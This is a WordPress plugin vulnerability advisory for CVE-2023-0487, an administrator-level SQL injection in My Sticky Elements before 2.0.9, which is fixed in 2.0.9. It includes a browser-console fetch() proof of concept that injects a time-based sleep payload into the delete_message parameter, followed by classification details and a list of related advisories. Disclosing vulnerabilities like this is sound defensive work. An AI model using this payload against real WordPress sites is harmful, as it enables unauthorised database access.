WordPress Plugin Vulnerabilities

My Sticky Elements < 2.0.9 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when deleting messages, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

1. As an Administrator browse the following page (edit the URL accordingly): https://example.com/wp-admin/admin.php?page=my-sticky-elements-leads

2. Open the browser console and type the following command (edit the URL accordingly): (await fetch('https://example.com/wp-admin/admin.php?page=my-sticky-elements-leads', {method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:`stickyelement-contatc-submit=${document.getElementsByName('stickyelement-contatc-submit')[0].value }&delete_message["PoC"]=(SELECT sleep(10) FROM wp_users)`}))

3. Notice the 10 seconds delay that happens before getting the response, demonstrating that the SQL injection worked.

Affects Plugins

Plugin icon
mystickyelements
Fixed in 2.0.9

References

CVE
CVE-2023-0487

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
5.5 (medium)

Miscellaneous

Original Researcher
qerogram(at Kakao Style Corp.)
Submitter
qerogram(at Kakao Style Corp.)
Submitter website
https://github.com/qerogram
Verified
Yes
WPVDB ID
0e874a1d-c866-45fa-b456-c8012dca32af

Timeline

Publicly Published
2023-02-06 (about 1 years ago)
Added
2023-02-06 (about 1 years ago)
Last Updated
2023-02-06 (about 1 years ago)

Other

Published
Title
Published
2024-04-07
Title
User Activity Log <= 1.9 - Admin+ SQL Injection
Published
2015-07-10
Title
CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
Published
2021-10-11
Title
MAZ Loader < 1.3.3 - Contributor+ SQL Injection
Published
2022-04-13
Title
SEMA API < 4.02 - Unauthenticated SQLi
Published
2024-03-13
Title
Automatic < 3.92.1 - Unauthenticated SQL Injection